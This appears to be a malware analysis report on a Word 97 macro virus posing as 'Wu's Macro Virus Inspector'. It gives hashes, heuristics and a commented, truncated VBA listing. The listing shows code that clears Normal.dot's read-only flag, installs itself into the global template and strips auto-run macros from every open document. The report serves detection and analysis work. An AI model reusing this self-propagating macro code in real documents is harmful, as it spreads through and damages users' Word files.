Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 991eeee9e71d1acf…

MALICIOUS

Office (OLE)

48.5 KB Created: 2000-10-18 07:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-03
MD5: d7519a705e449aa91ace6dfc977dad18 SHA-1: 2aea1a52dcc1860a081fe4eba56c3f3c20b25f8a SHA-256: 991eeee9e71d1acf8a452a780ed9ca142c87866070fea7aaf397e93d6b1c8d99
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE (Word 97 binary) document whose VBA project defines the auto-execution entry points AutoExec, AutoExit and AutoOpen; the heuristics below additionally flag AutoOpen, Document_Open and Auto_Close markers. The recovered code calls itself "Wu's Macro Virus Inspector" (module VirusInspect, "Inspector Version 8.2"). Its Init routine resets the file attributes of Normal.dot with SetAttr(…, 32) — which clears a read-only flag on the global template — and then calls InfectTo(Application.NormalTemplate), i.e. it installs itself into the global template; KillVirus then deletes every AutoOpen/Document_Open/AutoClose/AutoExec-style procedure, and any Sub MAIN in a module named after one, from the VBA project of every open document and template, sparing only procedures whose first line contains "Wu". Self-installation into Normal.dot combined with automatic rewriting of other documents' VBA projects is macro-virus behaviour regardless of the "inspector" framing, which supports the MALICIOUS verdict. Whether the code also carries a further payload cannot be determined from this page, because the preview is truncated before the AutoOpen body and before the InfectTo, SafeSave and ShowStatus helpers. The legacy WordBasic auto-exec marker and the 67% slack region are consistent with an old Word 97 document (unused sectors may simply be left over from Word's in-place saves) and are not, by themselves, evidence of packing, obfuscation or an exploit.

Heuristics 6

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 49,664 bytes but its declared streams total only 16,486 bytes — 33,178 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Caveat for this sample: the unaccounted-for region has not been carved or shown to contain shellcode anywhere on this page, and large runs of unused sectors are also left behind by Word 97's incremental ("fast") saves of a document that has been edited repeatedly. Confirm with a dump of the slack sectors (entropy and XOR-key scan of the 33,178 bytes) before treating this as an exploit finding rather than as a pointer to investigate.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This heuristic's generic wording ("no modern VBA project was recovered") conflicts with OLE_VBA_MACROS above and with the extracted macros.bas artifact — a VBA project was recovered from this sample — so read it only as confirming that legacy-style auto-exec markers are present and that no stronger macro-virus family signature matched. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9249 bytes
SHA-256: 4d329c394d4c7f370e27a7d26eba99466e692afb23ea6791e6b68f94ad2aac6e
Preview script
First 1,000 lines of the extracted script
' --- Module "ThisDocument" (document class module): header attributes only;
'     olevba emitted no procedure code for it in this preview. ---
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' --- Module "VirusInspect": the standard module that carries all recovered code. ---
Attribute VB_Name = "VirusInspect"
' Inspector Version 8.2
Option Explicit


' Module-level state shared by the procedures below.
' Number of procedures deleted so far; incremented in DeleteCode, reset in Init and DetectAll.
Dim KillCount As Integer
' Array of auto-execution procedure/module names to hunt for (filled in by Init).
Dim sAutoNames  As Variant

' Set by Init after its first run so the Normal.dot modification happens only once per session.
Dim bInited As Boolean
' Declared but not referenced anywhere in the visible code.
Dim LatestVer As Double
' Declared but not referenced anywhere in the visible code.
Dim g_VBCom As Variant
' Names (doc.Name) of documents KillVirus has already processed; see Detected/SetDetectedFlag/ClearReg.
Dim DetectedList As New Collection
' Self-identifying banner. Not referenced in the visible code, but its "Wu" substring is the
' same marker KillSub looks for when deciding which procedures to spare.
Const Logo As String = "Wu's Macro Virus Inspector "



' Returns the 1-based position of doc in DetectedList (documents KillVirus has
' already processed), or 0 if it is not listed.
' doc is late-bound (Variant); only doc.Name is read, so the lookup is by document
' name alone — two documents with the same name are indistinguishable here.
Function Detected(doc As Variant) As Integer
Dim i As Integer
For i = 1 To DetectedList.count
  If (doc.Name = DetectedList.Item(i)) Then
    Detected = i
    Exit Function
  End If
Next
    Detected = 0
End Function
' Adds doc.Name to DetectedList when f is True (only if not already present),
' or removes it when f is False (only if present). Idempotent in both directions.
Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean)
Dim i As Integer
' i is the current 1-based index of doc in the list, or 0 if absent.
i = Detected(doc)
If (f) Then
    If (i < 1) Then
        DetectedList.Add (doc.Name)
    End If
Else
    If (i > 0) Then
        DetectedList.Remove (i)
    End If
End If
End Sub
' Empties DetectedList by repeatedly removing its first item, so every document
' will be treated as "not yet processed" on the next KillVirus call.
Sub ClearReg()
While DetectedList.count > 0
    DetectedList.Remove (1)
Wend
End Sub



' Removes n lines starting at line st from the CodeModule cm (via CodeModule.DeleteLines),
' bumps the global KillCount, and reports the deletion through ShowStatus.
' st is untyped (Variant). ShowStatus is not defined in the visible portion of the listing.
Sub DeleteCode(cm As Variant, ByVal st, n As Long)
KillCount = KillCount + 1
Call cm.DeleteLines(st, n)
' Note: the message lacks a space before "to" (renders as e.g. "Delete From Line 5to 12").
ShowStatus ("Delete From Line " & st & "to " & st + n)
End Sub
' Deletes the procedure called Name from CodeModule cm, unless that procedure's
' first line contains "Wu" (the author's marker — compare Logo and the "'Wu's Sub"
' comments on AutoExec/AutoExit below), so the inspector's own entry points survive.
' Does nothing if Name does not occur in the module's text, and any error raised by
' the CodeModule calls (e.g. Name is not a procedure) is swallowed by the Err: handler.
Sub KillSub(cm As Variant, ByVal Name As String)
' Note: in VBA "Dim i, n As Long" types only n as Long; i is a Variant.
Dim i, n As Long
'Dim cmd As CodeModule

  ' Plain-text search for Name from line 1, column 1 to past the last line; bail out if absent.
  If (Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1)) Then
   Exit Sub
  End If
  On Error GoTo Err
   ' Locate the procedure body; the second argument 0 is vbext_pk_Proc per the original comments.
   i = cm.ProcStartLine(Name, 0) 'vbext_pk_Proc)
   n = cm.ProcCountLines(Name, 0) ' vbext_pk_Proc)
    ' Spare any procedure whose first line mentions "Wu"; every other match is removed.
    If (InStr(1, cm.Lines(i, 1), "Wu", vbTextCompare) < 1) Then
     Call DeleteCode(cm, i, n)
    End If
    Exit Sub
Err:
End Sub
' For a CodeModule md whose name contains one of the auto-exec names in sAutoNames
' (AutoOpen, AutoClose, AutoExec, ...), deletes its procedure named "MAIN".
' NOTE(review): this looks aimed at WordBasic macros that Word 97 converts into a module
' named after the macro with a single Sub MAIN — confirm; the listing itself only shows
' the name match and the KillSub call. The name match is a case-insensitive substring test,
' so it may be invoked more than once for the same module.
Sub KillAutoMod(md As Variant)
Dim Name As Variant
        For Each Name In sAutoNames
               If (InStr(1, md.Name, Name, vbTextCompare) > 0) Then
                        Call KillSub(md, "MAIN")
               End If
        Next Name
 
End Sub

' Rewrites the VBA project of a single document/template (doc, late-bound):
'  1. runs Init (which, on first call, modifies Normal.dot — see Init);
'  2. skips doc if its name is already in DetectedList;
'  3. for every VBComponent, deletes Sub MAIN from auto-named modules (KillAutoMod),
'     then deletes every procedure named in sAutoNames from every module (KillSub),
'     then runs KillAutoMod again;
'  4. if anything was deleted, clears DetectedList and either saves the document
'     (SafeSave — not in the visible listing) or marks it dirty; otherwise restores
'     the document's Saved flag.
' Security note: this indiscriminately strips AutoOpen/Document_Open/... procedures
' from every open document and template except those carrying the "Wu" marker —
' legitimate macros are destroyed too, and the automatic modification of other
' documents' VBA projects is itself the behaviour macro-virus detections key on.
' Unused locals in the visible code: obj, n. "Dim j, n As Integer" leaves j a Variant.
Sub KillVirus(doc As Variant) 'Document)
'VBProject
Dim prj As Variant 'VBProject
Dim obj As Variant
Dim Name As Variant
Dim j, n As Integer
Dim md As Variant 'CodeModule
Dim VBCom As Variant 'VBComponents
Dim count As Integer
Dim saved As Boolean

Call Init
' Detected returns a non-zero index for an already-processed document.
If (Detected(doc)) Then
     Exit Sub
End If

 ' Remember whether the document was clean before the project is modified.
 saved = doc.saved
 
    ' count = KillCount before this document; compared afterwards to see if anything was deleted.
    count = KillCount
    Set prj = doc.VBProject
    Set VBCom = prj.VBComponents
    For j = 1 To VBCom.count
     Set md = VBCom.Item(j).CodeModule
        Call KillAutoMod(md)
    Next j
    For j = 1 To VBCom.count
    Set md = VBCom.Item(j).CodeModule
        ShowStatus "Scanning In " & md.Name
        For Each Name In sAutoNames
         Call KillSub(md, Name)
        Next Name
        Call KillAutoMod(md)
    Next j
    
    Call SetDetectedFlag(doc, True)
'    prj.VBComponents(1).Activate
    If (KillCount > count) Then
        ' ClearReg empties DetectedList, undoing the SetDetectedFlag just above —
        ' so a document in which something was deleted is not remembered as processed.
        ClearReg
        If (saved) Then
            Call SafeSave(doc)
        Else
         doc.saved = False
        End If
    Else
     ' Nothing deleted: re-assert the original Saved state (touching the VBProject
     ' presumably dirtied it — TODO confirm).
     If (saved) Then
     doc.saved = True
     End If
    End If
 
 End Sub
 
 
 
 
 
' Runs KillVirus over every open document (Documents) and every loaded template
' (Templates), reports the total via ShowStatus, then resets KillCount.
' Called from the AutoExec and AutoExit auto-macros below, i.e. at Word start-up and exit.
Sub DetectAll()

Dim doc As Variant 'Document
For Each doc In Documents
 Call KillVirus(doc)
Next
For Each doc In Templates
 Call KillVirus(doc)
Next
If (KillCount > 0) Then
    ' The two status strings are mojibake (GBK-encoded Chinese decoded as Latin-1 by the
    ' extractor); they appear to read roughly "Killed <n> viruses! But not saved" and
    ' "No macro virus found!" — approximate, recover from the raw bytes to confirm.
    ShowStatus "ɱµ�E" & KillCount & "¸ö²¡¶¾£¡µ«Î´±£´�E"
Else
    ShowStatus "δ·¢ÏÖº�E¡¶¾£¡"
End If
KillCount = 0
End Sub

 
 
 
  
 
' One-time initialisation (guarded by bInited):
'  - fills sAutoNames with the auto-execution procedure/module names the inspector deletes;
'  - sets the file attributes of Normal.dot to 32 (vbArchive) — SetAttr replaces the
'    attribute set, so this clears a read-only (or hidden) flag on the global template;
'  - calls InfectTo(Application.NormalTemplate). InfectTo is not in the visible listing,
'    but its name and its target — the global template — indicate that the module
'    installs itself into Normal.dot so it runs in every Word session. Clearing the
'    read-only flag and then writing to Normal.dot is the propagation step of a
'    classic Word macro virus, whatever the "inspector" label says.
'  - resets KillCount and DetectedList.
' Unused local in the visible code: i.
Sub Init()
    Dim i As Integer
    Dim obj As Variant
    
    If (bInited) Then
        Exit Sub
    End If
    'MsgBox "Init"
    sAutoNames = Array("Document_Close", "Document_Open", _
    "AutoClose", "AutoOpen", "Document_New", "AutoExec", _
     "AutoNew", "AutoExit")
    ' 32 = vbArchive; any ReadOnly/Hidden/System bits on Normal.dot are dropped here.
    Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive)
    Set obj = Application.NormalTemplate
    ' Self-installation into the global template (body not shown in this preview).
    Call InfectTo(obj)
    KillCount = 0
    ClearReg
    bInited = True
End Sub
' Word auto-macro: runs when Word starts (once this module lives in Normal.dot).
' The "'Wu's Sub" marker on the signature line is what KillSub checks to spare this procedure.
Sub AutoExec() 'Wu's Sub
 Call DetectAll
End Sub
' Word auto-macro: runs when Word exits. Same "'Wu's Sub" self-marker as AutoExec.
Sub AutoExit() 'Wu's Sub
 Call DetectAll
End Sub
Sub AutoOpen() '
... (truncated)